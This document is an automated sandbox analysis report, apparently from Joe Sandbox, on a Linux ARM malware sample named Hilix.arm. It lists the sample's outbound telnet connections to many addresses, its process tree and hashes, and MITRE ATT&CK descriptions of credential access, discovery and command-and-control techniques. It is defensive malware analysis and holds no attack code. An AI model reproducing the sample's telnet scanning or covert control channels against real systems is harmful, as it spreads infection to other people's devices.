Nov 2, 2021 01:46:13.861912012 CET	54003	23	192.168.2.23	17.115.12.123
Nov 2, 2021 01:46:13.861913919 CET	54003	23	192.168.2.23	53.91.59.214
Nov 2, 2021 01:46:13.861917019 CET	54003	23	192.168.2.23	32.75.164.239
Nov 2, 2021 01:46:13.861918926 CET	54003	23	192.168.2.23	90.169.232.12

HTTP Request Dependency Graph

127.0.0.1:52869

System Behavior

Analysis Process: Hilix.arm PID: 5244 Parent PID: 5115

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	/tmp/Hilix.arm
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5246 Parent PID: 5244

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5247 Parent PID: 5244

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5248 Parent PID: 5244

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5252 Parent PID: 5248

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5253 Parent PID: 5248

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5255 Parent PID: 5248

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5257 Parent PID: 5248

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: Hilix.arm PID: 5260 Parent PID: 5248

General

Start time:	01:46:13
Start date:	02/11/2021
Path:	/tmp/Hilix.arm
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Analysis Process: systemd PID: 5289 Parent PID: 1

General

Start time:	01:46:26
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5289 Parent PID: 1

General

Start time:	01:46:26
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -t
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 5290 Parent PID: 1

General

Start time:	01:46:27
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5290 Parent PID: 1

General

Start time:	01:46:27
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -D
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 5404 Parent PID: 1

General

Start time:	01:49:13
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5404 Parent PID: 1

General

Start time:	01:49:13
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -t
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 5405 Parent PID: 1

General

Start time:	01:49:13
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5405 Parent PID: 1

General

Start time:	01:49:13
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -D
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 5408 Parent PID: 1

General

Start time:	01:49:16
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5408 Parent PID: 1

General

Start time:	01:49:16
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -t
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Analysis Process: systemd PID: 5409 Parent PID: 1

General

Start time:	01:49:16
Start date:	02/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: sshd PID: 5409 Parent PID: 1

General

Start time:	01:49:16
Start date:	02/11/2021
Path:	/usr/sbin/sshd
Arguments:	/usr/sbin/sshd -D
File size:	876328 bytes
MD5 hash:	dbca7a6bbf7bf57fedac243d4b2cb340

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report Hilix.arm

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

PCAP (Network Traffic)

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: Hilix.arm PID: 5244 Parent PID: 5115

General

Analysis Process: Hilix.arm PID: 5246 Parent PID: 5244

General

Analysis Process: Hilix.arm PID: 5247 Parent PID: 5244

General

Analysis Process: Hilix.arm PID: 5248 Parent PID: 5244

General

Analysis Process: Hilix.arm PID: 5252 Parent PID: 5248

General

Analysis Process: Hilix.arm PID: 5253 Parent PID: 5248

General

Analysis Process: Hilix.arm PID: 5255 Parent PID: 5248

General

Analysis Process: Hilix.arm PID: 5257 Parent PID: 5248

General

Analysis Process: Hilix.arm PID: 5260 Parent PID: 5248

General